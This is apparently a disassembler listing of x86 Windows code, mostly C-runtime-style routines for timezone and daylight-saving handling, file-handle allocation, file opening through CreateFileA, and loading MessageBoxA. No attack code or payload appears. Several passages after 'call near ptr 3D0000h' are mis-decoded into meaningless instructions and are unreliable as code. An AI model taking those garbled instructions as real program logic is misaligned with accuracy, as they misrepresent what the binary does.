loc_418C66: ; CODE XREF: seg000:00418C53�j
; seg000:00418C59�j
mov eax, ds:dword_42EBCC
and byte ptr [eax], 0
loc_418C6E: ; CODE XREF: seg000:00418C64�j
lea eax, [esp+10h]
push eax
push ebp
push 3Fh
push ds:dword_42EBD0
push ebx
push offset dword_45FAA8
push edi
push ds:dword_45F8E0
call esi ; WideCharToMultiByte
test eax, eax
jz loc_418DD2
cmp [esp+10h], ebp
jnz loc_418DD2
mov eax, ds:dword_42EBD0
and byte ptr [eax+3Fh], 0
jmp loc_418DDA
; ---------------------------------------------------------------------------
loc_418CAB: ; CODE XREF: seg000:00418BAF�j
cmp byte ptr [esi], 0
jz loc_418DDA
mov eax, ds:dword_45FAFC
cmp eax, ebp
jz short loc_418CCE
push eax
push esi
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_418DDA
loc_418CCE: ; CODE XREF: seg000:00418CBB�j
push ds:dword_45FAFC
call sub_410C83
push esi
call sub_410B60
inc eax
push eax
call sub_410C0F
add esp, 0Ch
cmp eax, ebp
mov ds:dword_45FAFC, eax
jz loc_418DDA
push esi
push eax
call sub_411B70
push 3
push esi
push ds:dword_42EBCC
call sub_411D00
mov eax, ds:dword_42EBCC
add esi, 3
add esp, 14h
and byte ptr [eax+3], 0
cmp byte ptr [esi], 2Dh
jnz short loc_418D23
push 1
inc esi
pop edi
loc_418D23: ; CODE XREF: seg000:00418D1D�j
push esi
call sub_4109F4
pop ecx
mov bl, 30h
mov ecx, eax
imul ecx, 0E10h
mov ds:dword_42EB40, ecx
loc_418D3A: ; CODE XREF: seg000:00418D49�j
mov al, [esi]
cmp al, 2Bh
jz short loc_418D48
cmp al, bl
jl short loc_418D4B
cmp al, 39h
jg short loc_418D4B
loc_418D48: ; CODE XREF: seg000:00418D3E�j
inc esi
jmp short loc_418D3A
; ---------------------------------------------------------------------------
loc_418D4B: ; CODE XREF: seg000:00418D42�j
; seg000:00418D46�j
cmp byte ptr [esi], 3Ah
jnz short loc_418D9E
inc esi
push esi
call sub_4109F4
imul eax, 3Ch
pop ecx
mov ecx, ds:dword_42EB40
add ecx, eax
mov ds:dword_42EB40, ecx
loc_418D69: ; CODE XREF: seg000:00418D74�j
mov al, [esi]
cmp al, bl
jl short loc_418D76
cmp al, 39h
jg short loc_418D76
inc esi
jmp short loc_418D69
; ---------------------------------------------------------------------------
loc_418D76: ; CODE XREF: seg000:00418D6D�j
; seg000:00418D71�j
cmp byte ptr [esi], 3Ah
jnz short loc_418D9E
inc esi
push esi
call sub_4109F4
pop ecx
mov ecx, ds:dword_42EB40
add ecx, eax
mov ds:dword_42EB40, ecx
loc_418D91: ; CODE XREF: seg000:00418D9C�j
mov al, [esi]
cmp al, bl
jl short loc_418D9E
cmp al, 39h
jg short loc_418D9E
inc esi
jmp short loc_418D91
; ---------------------------------------------------------------------------
loc_418D9E: ; CODE XREF: seg000:00418D4E�j
; seg000:00418D79�j ...
cmp edi, ebp
jz short loc_418DAA
neg ecx
mov ds:dword_42EB40, ecx
loc_418DAA: ; CODE XREF: seg000:00418DA0�j
movsx eax, byte ptr [esi]
cmp eax, ebp
mov ds:dword_42EB44, eax
jz short loc_418DD2
push 3
push esi
push ds:dword_42EBD0
call sub_411D00
mov eax, ds:dword_42EBD0
add esp, 0Ch
and byte ptr [eax+3], 0
jmp short loc_418DDA
; ---------------------------------------------------------------------------
loc_418DD2: ; CODE XREF: seg000:00418C8D�j
; seg000:00418C97�j ...
mov eax, ds:dword_42EBD0
and byte ptr [eax], 0
loc_418DDA: ; CODE XREF: seg000:00418BC2�j
; seg000:00418CA6�j ...
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; =============== S U B R O U T I N E =======================================
sub_418DE0 proc near ; CODE XREF: sub_41623E+A5�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor edi, edi
cmp ds:dword_42EB44, edi
jnz short loc_418DF4
loc_418DED: ; CODE XREF: sub_418DE0+148�j
; sub_418DE0+150�j ...
xor eax, eax
jmp loc_418F40
; ---------------------------------------------------------------------------
loc_418DF4: ; CODE XREF: sub_418DE0+B�j
mov esi, [esp+0Ch+arg_0]
push 1
pop ebx
mov eax, [esi+14h]
cmp eax, ds:dword_42EBD8
jnz short loc_418E12
cmp eax, ds:dword_42EBE8
jz loc_418F14
loc_418E12: ; CODE XREF: sub_418DE0+24�j
cmp ds:dword_45FA48, edi
jz loc_418EEA
movzx ecx, ds:word_45FAF6
push ecx
cmp ds:word_45FAE8, di
movzx ecx, ds:word_45FAF4
push ecx
movzx ecx, ds:word_45FAF2
push ecx
movzx ecx, ds:word_45FAF0
push ecx
jnz short loc_418E64
movzx ecx, ds:word_45FAEC
push edi
push ecx
movzx ecx, ds:word_45FAEE
push ecx
movzx ecx, ds:word_45FAEA
push ecx
push eax
push ebx
jmp short loc_418E78
; ---------------------------------------------------------------------------
loc_418E64: ; CODE XREF: sub_418DE0+65�j
movzx ecx, ds:word_45FAEE
push ecx
push edi
movzx ecx, ds:word_45FAEA
push edi
push ecx
push eax
push edi
loc_418E78: ; CODE XREF: sub_418DE0+82�j
push ebx
call sub_418F8C
movzx eax, ds:word_45FAA2
add esp, 2Ch
cmp ds:word_45FA94, di
push eax
movzx eax, ds:word_45FAA0
push eax
movzx eax, ds:word_45FA9E
push eax
movzx eax, ds:word_45FA9C
push eax
jnz short loc_418ED2
movzx eax, ds:word_45FA98
push edi
push eax
movzx eax, ds:word_45FA9A
push eax
movzx eax, ds:word_45FA96
push eax
push dword ptr [esi+14h]
push ebx
loc_418EC7: ; CODE XREF: sub_418DE0+108�j
push edi
call sub_418F8C
add esp, 2Ch
jmp short loc_418F14
; ---------------------------------------------------------------------------
loc_418ED2: ; CODE XREF: sub_418DE0+C8�j
movzx eax, ds:word_45FA9A
push eax
push edi
movzx eax, ds:word_45FA96
push edi
push eax
push dword ptr [esi+14h]
push edi
jmp short loc_418EC7
; ---------------------------------------------------------------------------
loc_418EEA: ; CODE XREF: sub_418DE0+38�j
push edi
push edi
push edi
push 2
push edi
push edi
push ebx
push 4
push eax
push ebx
push ebx
call sub_418F8C
push edi
push edi
push edi
push 2
push edi
push edi
push 5
push 0Ah
push dword ptr [esi+14h]
push ebx
push edi
call sub_418F8C
add esp, 58h
loc_418F14: ; CODE XREF: sub_418DE0+2C�j
; sub_418DE0+F0�j
mov edx, ds:dword_42EBDC
mov eax, ds:dword_42EBEC
mov ecx, [esi+1Ch]
cmp edx, eax
jge short loc_418F44
cmp ecx, edx
jl loc_418DED
cmp ecx, eax
jg loc_418DED
cmp ecx, edx
jle short loc_418F58
cmp ecx, eax
jge short loc_418F58
loc_418F3E: ; CODE XREF: sub_418DE0+166�j
; sub_418DE0+16A�j
mov eax, ebx
loc_418F40: ; CODE XREF: sub_418DE0+F�j
; sub_418DE0+19D�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_418F44: ; CODE XREF: sub_418DE0+144�j
cmp ecx, eax
jl short loc_418F3E
cmp ecx, edx
jg short loc_418F3E
cmp ecx, eax
jle short loc_418F58
cmp ecx, edx
jl loc_418DED
loc_418F58: ; CODE XREF: sub_418DE0+158�j
; sub_418DE0+15C�j ...
mov eax, [esi+8]
imul eax, 3Ch
add eax, [esi+4]
imul eax, 3Ch
add eax, [esi]
imul eax, 3E8h
cmp ecx, edx
jnz short loc_418F7F
xor ecx, ecx
cmp eax, ds:dword_42EBE0
setnl cl
loc_418F7B: ; CODE XREF: sub_418DE0+1AA�j
mov eax, ecx
jmp short loc_418F40
; ---------------------------------------------------------------------------
loc_418F7F: ; CODE XREF: sub_418DE0+18E�j
xor ecx, ecx
cmp eax, ds:dword_42EBF0
setl cl
jmp short loc_418F7B
sub_418DE0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418F8C proc near ; CODE XREF: sub_418DE0+99�p
; sub_418DE0+E8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 1
push ebx
mov ebx, [ebp+arg_8]
push esi
jnz loc_419027
mov eax, [ebp+arg_C]
mov [ebp+arg_8], ebx
and [ebp+arg_8], 3
mov esi, eax
jnz short loc_418FB7
shl esi, 2
mov eax, ds:dword_42EBF0[esi]
jmp short loc_418FC0
; ---------------------------------------------------------------------------
loc_418FB7: ; CODE XREF: sub_418F8C+1E�j
shl esi, 2
mov eax, ds:dword_42EC24[esi]
loc_418FC0: ; CODE XREF: sub_418F8C+29�j
mov edx, ebx
lea ecx, [eax+1]
imul edx, 16Dh
lea eax, [ebx-1]
push edi
sar eax, 2
mov edi, ecx
push 7
add edi, eax
lea eax, [edx+edi-63DBh]
pop edi
cdq
idiv edi
mov eax, [ebp+arg_10]
pop edi
cmp edx, [ebp+arg_14]
jge short loc_418FFA
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
lea ecx, [ecx+eax-7]
jmp short loc_419004
; ---------------------------------------------------------------------------
loc_418FFA: ; CODE XREF: sub_418F8C+5E�j
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
add ecx, eax
loc_419004: ; CODE XREF: sub_418F8C+6C�j
cmp [ebp+arg_10], 5
jnz short loc_419042
cmp [ebp+arg_8], 0
jnz short loc_419018
mov esi, ds:dword_42EBF4[esi]
jmp short loc_41901E
; ---------------------------------------------------------------------------
loc_419018: ; CODE XREF: sub_418F8C+82�j
mov esi, ds:dword_42EC28[esi]
loc_41901E: ; CODE XREF: sub_418F8C+8A�j
cmp ecx, esi
jle short loc_419042
sub ecx, 7
jmp short loc_419042
; ---------------------------------------------------------------------------
loc_419027: ; CODE XREF: sub_418F8C+C�j
mov eax, [ebp+arg_C]
test bl, 3
jnz short loc_419038
mov ecx, ds:dword_42EBF0[eax*4]
jmp short loc_41903F
; ---------------------------------------------------------------------------
loc_419038: ; CODE XREF: sub_418F8C+A1�j
mov ecx, ds:dword_42EC24[eax*4]
loc_41903F: ; CODE XREF: sub_418F8C+AA�j
add ecx, [ebp+arg_18]
loc_419042: ; CODE XREF: sub_418F8C+7C�j
; sub_418F8C+94�j ...
cmp [ebp+arg_0], 1
jnz short loc_419073
mov eax, [ebp+arg_1C]
mov ds:dword_42EBDC, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
mov ds:dword_42EBD8, ebx
imul eax, 3Ch
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov ds:dword_42EBE0, eax
jmp short loc_4190C8
; ---------------------------------------------------------------------------
loc_419073: ; CODE XREF: sub_418F8C+BA�j
mov eax, [ebp+arg_1C]
mov ds:dword_42EBEC, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
imul eax, 3Ch
add eax, ds:dword_42EB48
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov ds:dword_42EBF0, eax
jns short loc_4190AB
add eax, 5265C00h
dec ecx
mov ds:dword_42EBF0, eax
jmp short loc_4190BC
; ---------------------------------------------------------------------------
loc_4190AB: ; CODE XREF: sub_418F8C+110�j
mov edx, 5265C00h
cmp eax, edx
jl short loc_4190C2
sub eax, edx
inc ecx
mov ds:dword_42EBF0, eax
loc_4190BC: ; CODE XREF: sub_418F8C+11D�j
mov ds:dword_42EBEC, ecx
loc_4190C2: ; CODE XREF: sub_418F8C+126�j
mov ds:dword_42EBE8, ebx
loc_4190C8: ; CODE XREF: sub_418F8C+E5�j
pop esi
pop ebx
pop ebp
retn
sub_418F8C endp
; =============== S U B R O U T I N E =======================================
sub_4190CC proc near ; CODE XREF: sub_4192E6:loc_41945E�p
push ebx
push esi
push edi
or ebx, 0FFFFFFFFh
xor edi, edi
xor esi, esi
mov ecx, offset dword_460B60
loc_4190DB: ; CODE XREF: sub_4190CC+48�j
mov eax, [ecx]
test eax, eax
jz short loc_419118
lea edx, [eax+100h]
loc_4190E7: ; CODE XREF: sub_4190CC+28�j
cmp eax, edx
jnb short loc_419107
test byte ptr [eax+4], 1
jz short loc_4190F6
add eax, 8
jmp short loc_4190E7
; ---------------------------------------------------------------------------
loc_4190F6: ; CODE XREF: sub_4190CC+23�j
or dword ptr [eax], 0FFFFFFFFh
sub eax, [ecx]
sar eax, 3
add eax, esi
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_41915B
loc_419107: ; CODE XREF: sub_4190CC+1D�j
add ecx, 4
inc edi
add esi, 20h
cmp ecx, offset dword_460C60
jl short loc_4190DB
jmp short loc_41915B
; ---------------------------------------------------------------------------
loc_419118: ; CODE XREF: sub_4190CC+13�j
mov esi, 100h
push esi
call sub_410C0F
test eax, eax
pop ecx
jz short loc_41915B
add ds:dword_460C60, 20h
lea ecx, ds:460B60h[edi*4]
lea edx, [eax+100h]
mov [ecx], eax
loc_41913E: ; CODE XREF: sub_4190CC+88�j
cmp eax, edx
jnb short loc_419156
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov edx, [ecx]
add eax, 8
add edx, esi
jmp short loc_41913E
; ---------------------------------------------------------------------------
loc_419156: ; CODE XREF: sub_4190CC+74�j
shl edi, 5
mov ebx, edi
loc_41915B: ; CODE XREF: sub_4190CC+39�j
; sub_4190CC+4A�j ...
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_4190CC endp
; =============== S U B R O U T I N E =======================================
sub_419161 proc near ; CODE XREF: sub_4192E6+1F4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
cmp eax, ds:dword_460C60
push edi
jnb short loc_4191C1
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:460B60h[ecx*4]
shl esi, 3
mov ecx, [edi]
cmp dword ptr [ecx+esi], 0FFFFFFFFh
jnz short loc_4191C1
cmp ds:dword_42E184, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short near ptr loc_4191B6+1
sub eax, 0
jz short loc_4191AE
dec eax
jz short loc_4191A9
dec eax
jnz short near ptr loc_4191B6+1
push ebx
push 0FFFFFFF4h
jmp short loc_4191B1
; ---------------------------------------------------------------------------
loc_4191A9: ; CODE XREF: sub_419161+3E�j
push ebx
push 0FFFFFFF5h
jmp short loc_4191B1
; ---------------------------------------------------------------------------
loc_4191AE: ; CODE XREF: sub_419161+3B�j
push ebx
push 0FFFFFFF6h
loc_4191B1: ; CODE XREF: sub_419161+46�j
; sub_419161+4B�j
call near ptr 3D0000h
loc_4191B6: ; CODE XREF: sub_419161+36�j
; sub_419161+41�j
or byte ptr [ebx+301C8907h], 33h
rcr byte ptr [ebx-15h], 14h
loc_4191C1: ; CODE XREF: sub_419161+C�j
; sub_419161+28�j
and ds:dword_45F848, 0
mov ds:dword_45F844, 9
or eax, 0FFFFFFFFh
pop edi
pop esi
retn
sub_419161 endp
; =============== S U B R O U T I N E =======================================
sub_4191D8 proc near ; CODE XREF: sub_416300+7C�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
cmp ecx, ds:dword_460C60
push edi
jnb short loc_41923B
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea edi, ds:460B60h[eax*4]
shl esi, 3
mov eax, [edi]
add eax, esi
test byte ptr [eax+4], 1
jz short loc_41923B
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_41923B
cmp ds:dword_42E184, 1
jnz short near ptr loc_419230+1
xor eax, eax
sub ecx, eax
jz short loc_419228
dec ecx
jz short loc_419223
dec ecx
jnz short near ptr loc_419230+1
push eax
push 0FFFFFFF4h
jmp short loc_41922B
; ---------------------------------------------------------------------------
loc_419223: ; CODE XREF: sub_4191D8+41�j
push eax
push 0FFFFFFF5h
jmp short loc_41922B
; ---------------------------------------------------------------------------
loc_419228: ; CODE XREF: sub_4191D8+3E�j
push eax
push 0FFFFFFF6h
loc_41922B: ; CODE XREF: sub_4191D8+49�j
; sub_4191D8+4E�j
call near ptr 3D0000h
loc_419230: ; CODE XREF: sub_4191D8+38�j
; sub_4191D8+44�j
xchg cl, [ebx+300C8307h]
push dword ptr [ebx]
shr bl, 14h
loc_41923B: ; CODE XREF: sub_4191D8+C�j
; sub_4191D8+2A�j ...
and ds:dword_45F848, 0
mov ds:dword_45F844, 9
or eax, 0FFFFFFFFh
pop edi
pop esi
retn
sub_4191D8 endp
; =============== S U B R O U T I N E =======================================
sub_419252 proc near ; CODE XREF: sub_416300+32�p
; sub_416300+49�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, ds:dword_460C60
jnb short loc_41927A
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, ds:dword_460B60[ecx*4]
test byte ptr [ecx+eax*8+4], 1
lea eax, [ecx+eax*8]
jz short loc_41927A
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_41927A: ; CODE XREF: sub_419252+A�j
; sub_419252+23�j
and ds:dword_45F848, 0
mov ds:dword_45F844, 9
or eax, 0FFFFFFFFh
retn
sub_419252 endp
; =============== S U B R O U T I N E =======================================
sub_41928F proc near ; CODE XREF: sub_4163DE+2B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, ds:dword_460C60
jnb short loc_4192D8
mov ecx, eax
mov edx, eax
sar ecx, 5
and edx, 1Fh
mov ecx, ds:dword_460B60[ecx*4]
test byte ptr [ecx+edx*8+4], 1
jz short loc_4192D8
push eax
call sub_419252
pop ecx
push eax
call near ptr 3D0000h
mov al, [ebp-0F78A40h]
adc eax, offset dword_41C068
jmp short loc_4192CF
; ---------------------------------------------------------------------------
xor eax, eax
loc_4192CF: ; CODE XREF: sub_41928F+3C�j
test eax, eax
jz short locret_4192E5
mov ds:dword_45F848, eax
loc_4192D8: ; CODE XREF: sub_41928F+A�j
; sub_41928F+22�j
mov ds:dword_45F844, 9
or eax, 0FFFFFFFFh
locret_4192E5: ; CODE XREF: sub_41928F+42�j
retn
sub_41928F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4192E6 proc near ; CODE XREF: sub_4167BA+13F�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov ecx, [ebp+arg_4]
push ebx
xor ebx, ebx
push esi
test cl, 80h
push edi
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], ebx
jz short loc_41930C
mov [ebp+var_14], ebx
mov [ebp+var_1], 10h
jmp short loc_419317
; ---------------------------------------------------------------------------
loc_41930C: ; CODE XREF: sub_4192E6+1B�j
and [ebp+var_1], 0
mov [ebp+var_14], 1
loc_419317: ; CODE XREF: sub_4192E6+24�j
mov eax, 8000h
test ecx, eax
jnz short loc_419331
test ch, 40h
jnz short loc_41932D
cmp ds:dword_45FB28, eax
jz short loc_419331
loc_41932D: ; CODE XREF: sub_4192E6+3D�j
or [ebp+var_1], 80h
loc_419331: ; CODE XREF: sub_4192E6+38�j
; sub_4192E6+45�j
push 3
mov eax, ecx
pop esi
and eax, esi
sub eax, ebx
jz short loc_419369
dec eax
jz short loc_419360
dec eax
jz short loc_419357
loc_419342: ; CODE XREF: sub_4192E6+9F�j
; sub_4192E6+E8�j ...
mov ds:dword_45F844, 16h
mov ds:dword_45F848, ebx
jmp loc_41957C
; ---------------------------------------------------------------------------
loc_419357: ; CODE XREF: sub_4192E6+5A�j
mov [ebp+var_C], 0C0000000h
jmp short loc_419370
; ---------------------------------------------------------------------------
loc_419360: ; CODE XREF: sub_4192E6+57�j
mov [ebp+var_C], 40000000h
jmp short loc_419370
; ---------------------------------------------------------------------------
loc_419369: ; CODE XREF: sub_4192E6+54�j
mov [ebp+var_C], 80000000h
loc_419370: ; CODE XREF: sub_4192E6+78�j
; sub_4192E6+81�j
mov eax, [ebp+arg_8]
cmp eax, 10h
jz short loc_41939E
cmp eax, 20h
jz short loc_419395
cmp eax, 30h
jz short loc_41938C
cmp eax, 40h
jnz short loc_419342
mov [ebp+var_10], esi
jmp short loc_4193A1
; ---------------------------------------------------------------------------
loc_41938C: ; CODE XREF: sub_4192E6+9A�j
mov [ebp+var_10], 2
jmp short loc_4193A1
; ---------------------------------------------------------------------------
loc_419395: ; CODE XREF: sub_4192E6+95�j
mov [ebp+var_10], 1
jmp short loc_4193A1
; ---------------------------------------------------------------------------
loc_41939E: ; CODE XREF: sub_4192E6+90�j
mov [ebp+var_10], ebx
loc_4193A1: ; CODE XREF: sub_4192E6+A4�j
; sub_4192E6+AD�j ...
mov edx, 700h
mov eax, 400h
and ecx, edx
mov edi, 100h
cmp ecx, eax
jg short loc_4193EB
jz short loc_4193E6
cmp ecx, ebx
jz short loc_4193E6
cmp ecx, edi
jz short loc_4193DD
cmp ecx, 200h
jz short loc_419404
cmp ecx, 300h
jnz loc_419342
mov [ebp+var_8], 2
jmp short loc_419414
; ---------------------------------------------------------------------------
loc_4193DD: ; CODE XREF: sub_4192E6+D8�j
mov [ebp+var_8], 4
jmp short loc_419414
; ---------------------------------------------------------------------------
loc_4193E6: ; CODE XREF: sub_4192E6+D0�j
; sub_4192E6+D4�j
mov [ebp+var_8], esi
jmp short loc_419414
; ---------------------------------------------------------------------------
loc_4193EB: ; CODE XREF: sub_4192E6+CE�j
cmp ecx, 500h
jz short loc_41940D
cmp ecx, 600h
jz short loc_419404
cmp ecx, edx
jz short loc_41940D
jmp loc_419342
; ---------------------------------------------------------------------------
loc_419404: ; CODE XREF: sub_4192E6+E0�j
; sub_4192E6+113�j
mov [ebp+var_8], 5
jmp short loc_419414
; ---------------------------------------------------------------------------
loc_41940D: ; CODE XREF: sub_4192E6+10B�j
; sub_4192E6+117�j
mov [ebp+var_8], 1
loc_419414: ; CODE XREF: sub_4192E6+F5�j
; sub_4192E6+FE�j ...
mov eax, [ebp+arg_4]
mov esi, 80h
test eax, edi
jz short loc_419433
mov ecx, ds:dword_45F84C
not ecx
and ecx, [ebp+arg_C]
test cl, 80h
jnz short loc_419433
push 1
pop esi
loc_419433: ; CODE XREF: sub_4192E6+138�j
; sub_4192E6+148�j
test al, 40h
jz short loc_419441
or esi, 4000000h
or byte ptr [ebp+var_C+2], 1
loc_419441: ; CODE XREF: sub_4192E6+14F�j
test ah, 10h
jz short loc_419448
or esi, edi
loc_419448: ; CODE XREF: sub_4192E6+15E�j
test al, 20h
jz short loc_419454
or esi, 8000000h
jmp short loc_41945E
; ---------------------------------------------------------------------------
loc_419454: ; CODE XREF: sub_4192E6+164�j
test al, 10h
jz short loc_41945E
or esi, 10000000h
loc_41945E: ; CODE XREF: sub_4192E6+16C�j
; sub_4192E6+170�j
call sub_4190CC
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
jnz short loc_41947F
and ds:dword_45F848, 0
mov ds:dword_45F844, 18h
jmp short loc_4194BD
; ---------------------------------------------------------------------------
loc_41947F: ; CODE XREF: sub_4192E6+184�j
push 0
push esi
push [ebp+var_8]
lea eax, [ebp+var_1C]
push eax
push [ebp+var_10]
push [ebp+var_C]
push [ebp+arg_0]
call ds:dword_41C078 ; CreateFileA
mov esi, eax
cmp esi, edi
jz short loc_4194B0
push esi
call near ptr 3D0000h
scasd
test eax, eax
jnz short loc_4194C4
push esi
call ds:dword_41C070 ; CloseHandle
loc_4194B0: ; CODE XREF: sub_4192E6+1B6�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
call sub_41724D
pop ecx
loc_4194BD: ; CODE XREF: sub_4192E6+197�j
mov eax, edi
jmp loc_41959A
; ---------------------------------------------------------------------------
loc_4194C4: ; CODE XREF: sub_4192E6+1C1�j
cmp eax, 2
jnz short loc_4194CF
or [ebp+var_1], 40h
jmp short loc_4194D8
; ---------------------------------------------------------------------------
loc_4194CF: ; CODE XREF: sub_4192E6+1E1�j
cmp eax, 3
jnz short loc_4194D8
or [ebp+var_1], 8
loc_4194D8: ; CODE XREF: sub_4192E6+1E7�j
; sub_4192E6+1EC�j
push esi
push ebx
call sub_419161
pop ecx
mov al, [ebp+var_1]
pop ecx
mov esi, ebx
mov ecx, ebx
or al, 1
sar ecx, 5
and esi, 1Fh
mov byte ptr [ebp+arg_0+3], al
lea edi, ds:460B60h[ecx*4]
shl esi, 3
mov ecx, [edi]
and byte ptr [ebp+arg_0+3], 48h
mov [ecx+esi+4], al
jnz short loc_419581
test al, 80h
jz short loc_419581
test byte ptr [ebp+arg_4], 2
jz short loc_419581
push 2
push 0FFFFFFFFh
push ebx
call sub_4169A2
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_419536
cmp ds:dword_45F848, 83h
jz short loc_419581
jmp short loc_419575
; ---------------------------------------------------------------------------
loc_419536: ; CODE XREF: sub_4192E6+240�j
and byte ptr [ebp+arg_8+3], 0
lea eax, [ebp+arg_8+3]
push 1
push eax
push ebx
call sub_4165C4
add esp, 0Ch
test eax, eax
jnz short loc_419563
cmp byte ptr [ebp+arg_8+3], 1Ah
jnz short loc_419563
push [ebp+var_10]
push ebx
call loc_41A233
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_419575
loc_419563: ; CODE XREF: sub_4192E6+265�j
; sub_4192E6+26B�j
push 0
push 0
push ebx
call sub_4169A2
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_419581
loc_419575: ; CODE XREF: sub_4192E6+24E�j
; sub_4192E6+27B�j
push ebx
call sub_416300
pop ecx
loc_41957C: ; CODE XREF: sub_4192E6+6C�j
or eax, 0FFFFFFFFh
jmp short loc_41959A
; ---------------------------------------------------------------------------
loc_419581: ; CODE XREF: sub_4192E6+221�j
; sub_4192E6+225�j ...
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_419598
test byte ptr [ebp+arg_4], 8
jz short loc_419598
mov eax, [edi]
or byte ptr [eax+esi+4], 20h
lea eax, [eax+esi+4]
loc_419598: ; CODE XREF: sub_4192E6+29F�j
; sub_4192E6+2A5�j
mov eax, ebx
loc_41959A: ; CODE XREF: sub_4192E6+1D9�j
; sub_4192E6+299�j
pop edi
pop esi
pop ebx
leave
retn
sub_4192E6 endp
; =============== S U B R O U T I N E =======================================
sub_41959F proc near ; CODE XREF: seg000:0041752D�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_4195B0
add esp, 0Ch
retn
sub_41959F endp
; =============== S U B R O U T I N E =======================================
sub_4195B0 proc near ; CODE XREF: sub_41959F+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test ds:byte_460D81[eax], cl
jnz short loc_4195DD
cmp [esp+arg_4], 0
jz short loc_4195D6
movzx eax, ds:word_42E19A[eax*2]
and eax, [esp+arg_4]
jmp short loc_4195D8
; ---------------------------------------------------------------------------
loc_4195D6: ; CODE XREF: sub_4195B0+16�j
xor eax, eax
loc_4195D8: ; CODE XREF: sub_4195B0+24�j
test eax, eax
jnz short loc_4195DD
retn
; ---------------------------------------------------------------------------
loc_4195DD: ; CODE XREF: sub_4195B0+F�j
; sub_4195B0+2A�j
push 1
pop eax
retn
sub_4195B0 endp
; =============== S U B R O U T I N E =======================================
sub_4195E1 proc near ; CODE XREF: sub_417C59+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp ds:dword_45FB08, ebx
push esi
push edi
jnz short loc_419630
push offset dword_420D88
call ds:dword_41C0AC ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_419666
mov esi, ds:dword_41C0B0
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi
test eax, eax
mov ds:dword_45FB08, eax
jz short loc_419666
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov ds:dword_45FB0C, eax
call esi
mov ds:dword_45FB10, eax
loc_419630: ; CODE XREF: sub_4195E1+B�j
mov eax, ds:dword_45FB0C
test eax, eax
jz short loc_41964F
call eax
mov ebx, eax
test ebx, ebx
jz short loc_41964F
mov eax, ds:dword_45FB10
test eax, eax
jz short loc_41964F
push ebx
call eax
mov ebx, eax
loc_41964F: ; CODE XREF: sub_4195E1+56�j
; sub_4195E1+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call ds:dword_45FB08
loc_419662: ; CODE XREF: sub_4195E1+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_419666: ; CODE XREF: sub_4195E1+1C�j
; sub_4195E1+33�j
xor eax, eax
jmp short loc_419662
sub_4195E1 endp
; =============== S U B R O U T I N E =======================================
sub_41966A proc near ; CODE XREF: seg000:00417FE5�p
; seg000:00417FFE�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
imul esi, [esp+0Ch+arg_4]
cmp esi, 0FFFFFFE0h
mov ebx, esi
ja short loc_41968A
test esi, esi
jnz short loc_419684
push 1
pop esi
loc_419684: ; CODE XREF: sub_41966A+15�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_41968A: ; CODE XREF: sub_41966A+11�j
; sub_41966A+65�j
